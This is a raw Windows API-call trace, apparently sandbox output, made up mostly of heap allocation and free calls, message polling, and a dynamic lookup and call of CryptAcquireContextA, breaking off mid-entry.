1 [0188.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0188.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.503] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0188.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0188.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0188.503] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0188.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa950 [0188.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0188.504] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0188.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0188.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0188.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0188.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0188.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0188.504] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0188.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0188.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0188.505] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0188.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0188.505] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0188.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0188.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0188.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0188.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0188.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0188.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0188.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0188.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0188.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0188.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0188.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0188.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0188.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0188.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0188.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0188.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0188.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0188.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0188.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0188.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0188.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0188.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0188.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0188.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0188.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0188.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0188.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0188.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0188.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0188.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0188.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0188.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0188.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0188.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0188.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0188.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0188.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0188.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0188.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0188.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0188.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.510] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0188.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0188.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0188.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0188.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0188.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0188.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0188.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0188.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0188.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0188.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0188.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0188.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0188.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0188.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0188.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0188.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466df0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0188.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0188.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0188.512] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0188.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0188.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0188.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0188.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466df0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0188.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0188.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0188.513] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0188.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0188.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36f8 | out: hHeap=0x25c0000) returned 1 [0188.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0188.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0188.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0188.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0188.513] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xaa3868) returned 1 [0188.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0188.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0188.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0188.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0188.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0188.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0188.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0188.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0188.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0188.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0188.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0188.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0188.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0188.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0188.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0188.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0188.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0188.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0188.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0188.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0188.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0188.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0188.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0188.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0188.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0188.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0188.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0188.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0188.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0188.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0188.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0188.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0188.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0188.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0188.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: 